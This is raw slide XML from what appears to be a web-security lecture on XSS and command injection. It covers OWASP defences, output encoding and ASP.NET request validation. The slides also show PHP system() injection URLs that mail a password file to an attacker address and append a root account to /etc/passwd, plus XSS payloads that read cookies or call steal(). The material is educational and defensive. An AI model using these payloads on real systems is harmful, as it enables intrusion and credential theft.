              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="6467475"/>
            <a:ext cx="33416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Amit Klein ... XSS of the Third Kind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7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="4038600"/>
            <a:ext cx="3352800" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="32941"/>
            </a:srgbClr>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38915" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Defenses at server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38916"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38917"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38918"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38919"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38920"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38921"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38922"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38923"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38924"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38925" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2508250" y="2270125"/>
            <a:ext cx="2738438" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3892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3892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3892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38929"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38930"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38931"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38932"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38933"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38934"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38935"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38936"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smtClean="0"/>
              <a:t>How to Protect Yourself (OWASP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The best way to protect against XSS attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Validates all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification of what should be allowed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Do not attempt to identify active content and remove, filter, or sanitize it. There are too many types of active content and too many ways of encoding it to get around filters for such content. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Adopt a ‘positive’ security policy that specifies what is allowed. ‘Negative’ or attack signature based policies are difficult to maintain and are likely to be incomplete.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Input data validation and filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Never trust client-side data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Best: allow only what you expect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> Remove/encode special characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Many encodings, special chars!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>E.g., long (non-standard) UTF-8 encodings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="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Output filtering / encoding</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Remove / encode (X)HTML special chars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; for &lt;, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; for &gt;, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> for “ …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Allow only safe commands (e.g., no &lt;script&gt;…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Caution: `filter evasion` tricks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>See XSS Cheat Sheet for filter evasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>E.g., if filter allows quoting (of &lt;script&gt; etc.), use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    malformed quoting: &lt;IMG “””&gt;&lt;SCRIPT&gt;alert(“XSS”)…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Or: (long) UTF-8 encode, or…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Caution: Scripts not only in &lt;script&gt;!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Examples in a few slides</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ASP.NET output filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1295400"/>
            <a:ext cx="8610600" cy="4648200"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>validateRequest:    (on by default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Crashes page if finds  &lt;script&gt;  in POST data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Looks for hardcoded list of patterns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Can be disabled: &lt;%@  Page  validateRequest=“false"  %&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50180" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2936875" y="2971800"/>
            <a:ext cx="5978525" cy="3748088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="me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229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code injection using   system()</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dirty="0" smtClean="0"/>
              <a:t>Example: PHP server-side code for sending email</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Attacker can post</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="2105025"/>
            <a:ext cx="7064375" cy="1019175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $email = $_POST[“email”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $subject = $_POST[“subject”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  system(“mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>email –s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>subject &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>joinmynetwork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3733800"/>
            <a:ext cx="7064375" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>yourdomain.com/mail.php?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>email=hacker@hackerhome.net &amp;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     subject=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="5410200"/>
            <a:ext cx="7064375" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>yourdomain.com/mail.php?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     email=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hacker@hackerhome.net&amp;subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     echo “evil::0:0:root:/:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;&gt;/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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600" smtClean="0"/>
              <a:t>Caution: Scripts not only in &lt;script&gt;!</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JavaScript as scheme in URI</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>);”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> JavaScript On{event} attributes (handlers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnSubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Typical use:</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=“none” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=“alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=`https://bank.com/login` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=`steal()`&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;form&gt; action="logon.jsp" method="post"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>onsubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>hackImg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=new Image;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
